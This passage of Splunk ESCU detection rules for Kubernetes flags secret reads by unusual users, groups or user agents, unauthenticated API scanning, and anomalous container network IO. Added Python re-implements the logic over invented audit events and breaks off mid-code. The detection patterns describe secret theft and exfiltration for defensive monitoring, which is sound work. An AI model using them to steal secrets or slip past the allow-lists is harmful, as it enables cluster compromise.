Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual User Agent - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual user agent $userAgent$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual User Agent - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = 
greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | search NOT `kube_allowed_user_agents` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_user_agent_filter` [ESCU - Kubernetes Abuse of Secret by Unusual User Group - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user groups. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user group. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user groups. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user group. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. 
The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual User Group - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual user group $user.groups{}$ by user name $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual User Group - Rule action.correlationsearch.annotations = {"analytic_story": 
["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | search NOT `kube_allowed_user_groups` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_user_group_filter` [ESCU - Kubernetes Abuse of Secret by Unusual User Name - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user names. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user name. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user names. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user name. 
Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual User Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual user name $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual User Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | search NOT `kube_allowed_user_names` | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_user_name_filter` [ESCU - Kubernetes Access Scanning - Rule] action.escu = 0 action.escu.enabled = 1 
description = The following analytic detects potential scanning activities within a Kubernetes environment. It identifies unauthorized access attempts, probing of public APIs, or attempts to exploit known vulnerabilities. The analytic detects this behavior by monitoring Kubernetes audit logs for patterns indicative of scanning, such as repeated failed access attempts or unusual API requests. This behavior is worth identifying for a SOC as it could indicate an attackers preliminary step in an attack, aiming to gather information about the system to find potential vulnerabilities. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects potential scanning activities within a Kubernetes environment. It identifies unauthorized access attempts, probing of public APIs, or attempts to exploit known vulnerabilities. The analytic detects this behavior by monitoring Kubernetes audit logs for patterns indicative of scanning, such as repeated failed access attempts or unusual API requests. This behavior is worth identifying for a SOC as it could indicate an attackers preliminary step in an attack, aiming to gather information about the system to find potential vulnerabilities. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. 
This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Access Scanning - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes scanning from ip $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Access Scanning - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1046"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "user.groups{}"="system:unauthenticated" "responseStatus.code"=403 | iplocation sourceIPs{} | stats count values(userAgent) as userAgent values(user.username) as user.username values(user.groups{}) as user.groups{} values(verb) as verb values(requestURI) as 
requestURI values(responseStatus.code) as responseStatus.code values(responseStatus.message) as responseStatus.message values(responseStatus.reason) as responseStatus.reason values(responseStatus.status) as responseStatus.status by sourceIPs{} Country City | where count > 5 | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_access_scanning_filter` [ESCU - Kubernetes Anomalous Inbound Network Activity from Process - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection identifies inbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are reported with context identifying the Kubernetes cluster, the workload name, and the type of anomaly. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector and pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). It compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes and udp.packets metrics for destination (receiving) workload and process pairs over the last hour with the average and standard deviation of those metrics for the same pairs over the last 30 days, and flags values more than three standard deviations above the average as anomalously high inbound network activity. Anomalies in inbound network traffic may suggest that the container is receiving unexpected or unauthorized data, potentially indicative of a breach, a vulnerability exploitation attempt, an attempt to overload the service, or propagation of malware.
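The four Abuse of Secret searches and the Access Scanning search above share one shape: select audit events by verb and resource (or by group and response code), compare a field against an allow-list macro or a threshold, and group by caller. The following Python is an added example, not part of the Splunk content, that reproduces that logic over constructed Kubernetes audit events so the rules can be exercised offline. The contents of the kube_allowed_* macros, the IP-to-country table standing in for iplocation, and every name, address and user agent are assumptions made for the example.

```python
"""Added example (not Splunk's code): the filtering logic of the ESCU "Kubernetes Abuse of Secret by
Unusual Location / User Agent / User Group / User Name" rules and of the "Kubernetes Access Scanning"
rule, re-implemented over constructed Kubernetes audit events so it can be exercised offline."""
import json
from collections import defaultdict

# Assumed contents for the page's kube_allowed_* macros (the real macros are site-specific).
ALLOWED_LOCATIONS = {"United States"}
ALLOWED_USER_AGENTS = {"kubelet/v1.28.0", "app/1.0"}
ALLOWED_USER_GROUPS = {"system:serviceaccounts", "system:masters"}
ALLOWED_USER_NAMES = {"system:serviceaccount:prod:app", "admin"}
# Stand-in for the iplocation command: documentation-range addresses with invented countries.
GEO = {"10.0.0.5": "United States", "198.51.100.7": "Netherlands", "203.0.113.9": "Brazil"}


def audit_event(verb, uri, user, groups, src_ip, ua, code, resource=None, ns=None, name=None):
    """One audit event carrying the fields the searches use, in the API server's JSON layout."""
    ev = {"kind": "Event", "stage": "ResponseComplete", "verb": verb, "requestURI": uri,
          "user": {"username": user, "uid": "uid-" + user, "groups": groups},
          "sourceIPs": [src_ip], "userAgent": ua, "responseStatus": {"code": code},
          "requestReceivedTimestamp": "2023-12-06T10:00:00Z"}
    if resource:
        ev["objectRef"] = {"resource": resource, "namespace": ns, "name": name}
    return ev


# Constructed audit log (JSON lines): one legitimate secret read, one read with kubectl by an
# unexpected user/group from an unexpected country, one list (not a get), then unauthenticated 403s.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in
    [audit_event("get", "/api/v1/namespaces/prod/secrets/db-creds", "system:serviceaccount:prod:app",
                 ["system:serviceaccounts", "system:authenticated"], "10.0.0.5", "app/1.0", 200,
                 "secrets", "prod", "db-creds"),
     audit_event("get", "/api/v1/namespaces/prod/secrets/db-creds", "mallory",
                 ["developers", "system:authenticated"], "198.51.100.7", "kubectl/v1.28.0", 200,
                 "secrets", "prod", "db-creds"),
     audit_event("list", "/api/v1/namespaces/prod/secrets", "admin", ["system:masters"],
                 "10.0.0.5", "kubectl/v1.28.0", 200, "secrets", "prod")]
    + [audit_event("get", "/api/v1/namespaces/kube-system/pods", "system:anonymous",
                   ["system:unauthenticated"], "203.0.113.9", "python-requests/2.31", 403,
                   "pods", "kube-system") for _ in range(6)]
    + [audit_event("get", "/version", "system:anonymous", ["system:unauthenticated"],
                   "198.51.100.7", "curl/8.4.0", 403) for _ in range(2)])


def parse_audit_log(text):
    """Parse JSON-lines audit output (what the `kube_audit` macro selects), skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def secret_abuse(events):
    """The four 'Abuse of Secret by Unusual ...' searches: secret GETs whose source country, user
    agent, user groups or user name fall outside the allow-lists.
    Returns (rule, user, namespace/name, observed value) tuples."""
    hits = []
    for ev in events:
        ref = ev.get("objectRef") or {}
        if ref.get("resource") != "secrets" or ev.get("verb") != "get":
            continue
        user = ev["user"]["username"]
        groups = set(ev["user"].get("groups", []))
        country = GEO.get(ev["sourceIPs"][0], "")
        secret = f"{ref.get('namespace')}/{ref.get('name')}"
        if country not in ALLOWED_LOCATIONS:
            hits.append(("unusual_location", user, secret, country))
        if ev["userAgent"] not in ALLOWED_USER_AGENTS:
            hits.append(("unusual_user_agent", user, secret, ev["userAgent"]))
        # NOT (user.groups{}=a OR user.groups{}=b) on a multivalue field is true only when
        # none of the caller's groups is on the allow-list
        if not groups & ALLOWED_USER_GROUPS:
            hits.append(("unusual_user_group", user, secret, ",".join(sorted(groups))))
        if user not in ALLOWED_USER_NAMES:
            hits.append(("unusual_user_name", user, secret, user))
    return hits


def access_scanning(events, threshold=5):
    """The 'Kubernetes Access Scanning' search: 403 responses to system:unauthenticated callers,
    counted per source IP and reported only when count > threshold."""
    per_ip = defaultdict(lambda: {"count": 0, "requestURI": set(), "userAgent": set()})
    for ev in events:
        if "system:unauthenticated" not in ev["user"].get("groups", []):
            continue
        if ev["responseStatus"]["code"] != 403:
            continue
        row = per_ip[ev["sourceIPs"][0]]
        row["count"] += 1
        row["requestURI"].add(ev["requestURI"])
        row["userAgent"].add(ev["userAgent"])
    return {ip: dict(row, Country=GEO.get(ip, "")) for ip, row in per_ip.items()
            if row["count"] > threshold}


if __name__ == "__main__":
    events = parse_audit_log(SAMPLE_AUDIT_LOG)
    for hit in secret_abuse(events):
        print("secret abuse:", hit)
    for ip, row in access_scanning(events).items():
        print(f"scanning from {ip} ({row['Country']}): {row['count']} unauthenticated 403s")
```

Two things the run makes visible: the suspicious read trips all four rules at once, so in Enterprise Security one event can contribute four risk entries for the same user; and the `list` of the secrets in a namespace, which returns their contents as well, passes through untouched because the searches match only `verb=get`. Both are worth keeping in mind when tuning the allow-list macros.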
Successful compromise of a containerised application resulting in the ability to upload data can result in installation of command and control software or other malware, data integrity damage, container escape, and further compromise of the environment. Additionally, this kind of activity may result in resource contention, performance degradation and disruption to the normal operation of the environment. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection identifies inbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are reported with context identifying the Kubernetes cluster, the workload name, and the type of anomaly. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector and pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). It compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes and udp.packets metrics for destination (receiving) workload and process pairs over the last hour with the average and standard deviation of those metrics for the same pairs over the last 30 days, and flags values more than three standard deviations above the average as anomalously high inbound network activity. Anomalies in inbound network traffic may suggest that the container is receiving unexpected or unauthorized data, potentially indicative of a breach, a vulnerability exploitation attempt, an attempt to overload the service, or propagation of malware. Successful compromise of a containerised application resulting in the ability to upload data can result in installation of command and control software or other malware, data integrity damage, container escape, and further compromise of the environment.
Additionally, this kind of activity may result in resource contention, performance degradation and disruption to the normal operation of the environment. action.escu.how_to_implement = To gather NPM metrics, deploy the OpenTelemetry Collector to the Kubernetes cluster and enable Network Performance Monitoring according to the instructions in Splunk Docs: https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup To access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Then set up the add-on to ingest metrics from O11y Cloud with the following settings, leaving all other settings at their defaults:\ * Name sim_npm_metrics_to_metrics_index \ * Org ID \ * Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \ * Metric Resolution 10000 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-10 action.escu.modification_date = 2024-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Inbound Network Activity from Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Inbound Network Activity from Process in kubernetes cluster $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose
= 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Inbound Network Activity from Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(tcp.*) as tcp.* avg(udp.*) as udp.* where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name dest.workload.name dest.process.name span=10s | eval key='dest.workload.name' + ":" + 'dest.process.name' | join type=left key [ mstats avg(tcp.*) as avg_tcp.* avg(udp.*) as avg_udp.* stdev(tcp.*) as stdev_tcp.* stdev(udp.*) as stdev_udp.* where `kubernetes_metrics` AND earliest=-30d latest=-1h by dest.workload.name dest.process.name | eval key='dest.workload.name' + ":" + 'dest.process.name' ] | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 3 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. 
<>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | fillnull | eval anomalies = split(replace(anomalies, ",\s$$$$", "") ,", ") | where anomalies!="" | stats count(anomalies) as count values(anomalies) as anomalies by k8s.cluster.name dest.workload.name dest.process.name | where count > 5 | rename k8s.cluster.name as host | `kubernetes_anomalous_inbound_network_activity_from_process_filter` [ESCU - Kubernetes Anomalous Inbound Outbound Network IO - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies high Inbound or Outbound Network IO anomalies in a Kubernetes container. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, service disruptions, or unauthorized data transfers. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, financial losses, and reputational damage. 
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies high Inbound or Outbound Network IO anomalies in a Kubernetes container. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, service disruptions, or unauthorized data transfers. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, financial losses, and reputational damage. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Enable the Kubelet Stats receiver as well: the search reads the k8s.pod.network.io metric, split by its direction dimension, and that receiver is what emits it.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Inbound Outbound Network IO - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Inbound Outbound Network IO from container on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Inbound Outbound Network IO - Rule action.correlationsearch.annotations = 
{"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats avg(k8s.pod.network.io) as io where `kubernetes_metrics` by k8s.cluster.name k8s.pod.name k8s.node.name direction span=10s | eval service = replace('k8s.pod.name', "-\w{5}$$|-[abcdef0-9]{8,10}-\w{5}$$", "") | stats avg(eval(if(direction="transmit", io,null()))) as outbound_network_io avg(eval(if(direction="receive", io,null()))) as inbound_network_io by k8s.cluster.name k8s.node.name k8s.pod.name service _time | eval key = 'k8s.cluster.name' + ":" + 'service' | lookup k8s_container_network_io_baseline key | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 4 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by k8s.cluster.name k8s.node.name k8s.pod.name service | rename service as k8s.service | where count > 5 | rename k8s.node.name as host | `kubernetes_anomalous_inbound_outbound_network_traffic_io_filter` [ESCU - Kubernetes Anomalous Inbound to Outbound Network IO Ratio - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. 
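The Inbound Network Activity from Process search and the Inbound Outbound Network IO search above apply the same test: for each workload key, compare each 10-second sample of the current hour against a 30-day baseline of average and standard deviation (computed live by the mstats subsearch in the first rule, read from the k8s_container_network_io_baseline lookup in the second), describe every metric above avg + N * stdev, and alert only when more than five samples in the hour are anomalous. The following Python is an added example, not Splunk's code, that reproduces that comparison over constructed metric samples; the workload keys, the metric values and the baseline table are all invented for the example.

```python
"""Added example (not Splunk's code): the baseline-versus-current comparison used by the ESCU
"Kubernetes Anomalous Inbound Network Activity from Process" (3 sigma) and "Kubernetes Anomalous
Inbound Outbound Network IO" (4 sigma) searches, re-implemented over constructed metric samples."""
import statistics

SIGMA = 3                  # the "from Process" rule uses 3 standard deviations, the Network IO rules 4
MIN_ANOMALOUS_BUCKETS = 5  # both alert only when more than 5 of the hour's buckets are anomalous

# Constructed 30-day history and last-hour 10-second buckets, keyed like the searches'
# 'dest.workload.name' + ":" + 'dest.process.name'. All values are invented.
HISTORY = {
    "web:nginx":   {"tcp.bytes": [1000 + (i % 7) * 10 for i in range(30)],
                    "udp.packets": [10 + (i % 3) for i in range(30)]},
    "db:postgres": {"tcp.bytes": [2000 + (i % 5) * 25 for i in range(30)],
                    "udp.packets": [0 for _ in range(30)]},   # flat history: stdev is zero
}
NORMAL = {"tcp.bytes": 1035, "udp.packets": 11}
CURRENT_HOUR = {
    "web:nginx":   [NORMAL] * 5 + [{"tcp.bytes": 5000, "udp.packets": 11}] * 7,   # 7 hot buckets
    "db:postgres": [{"tcp.bytes": 2050, "udp.packets": 0}] * 9
                   + [{"tcp.bytes": 9000, "udp.packets": 3}] * 3,                 # only 3: no alert
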